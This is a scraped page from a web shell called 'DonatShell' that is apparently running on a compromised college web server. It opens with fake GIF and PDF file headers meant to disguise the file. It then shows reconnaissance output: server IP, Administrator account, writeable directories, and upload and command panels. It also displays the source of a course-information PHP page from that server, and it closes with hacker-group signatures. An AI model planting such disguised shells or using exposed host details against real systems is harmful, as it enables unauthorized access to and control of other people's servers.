GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Course/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Course//PersonalizedCourse.php
<?
// PersonalizedCourse.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$skipAuthentication = true; // Uncomment for after section authentication.
include('application.phpinc');
$currentPath = explode("/",$_SERVER['PHP_SELF']);
$headTitle = '_CST_ - Personalized Course';
$pageTitle = '_CST_<br>Personalized Course';
include('common/pageHeader.phpinc');
//include('Login/authenticate.phpinc'); // Uncomment for after section authentication.
$sectionTitle = "PersonalizedEducation";
include('common/sectionHeader.phpinc');
?>
<fieldset><legend>Personalized Delivery Model</legend><span class="normal">

<fieldset><legend>WHO</legend><span class="normal">
Who should take a personalized course?
<br>
Any student who is a self motivator could take a course under the personalized model.
The student always has the untimate responsibility for their education.
This is even more so under the personalized model as the student sets the pace of the course and must contact the instructor when help is needed.
<br>
A student who is unable to attend class either because of scheduling conflicts or distance may find the personalized model a method
</span></fieldset>

<fieldset><legend>WHAT</legend><span class="normal">
</span></fieldset>

<fieldset><legend>WHERE</legend><span class="normal">
</span></fieldset>

<fieldset><legend>WHEN</legend><span class="normal">
</span></fieldset>

<fieldset><legend>WHY</legend><span class="normal">
</span></fieldset>

<fieldset><legend>HOW</legend><span class="normal">
</span></fieldset>

</span></fieldset>

<?
include('common/sectionFooter.phpinc');
include('common/pageFooter.phpinc');
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team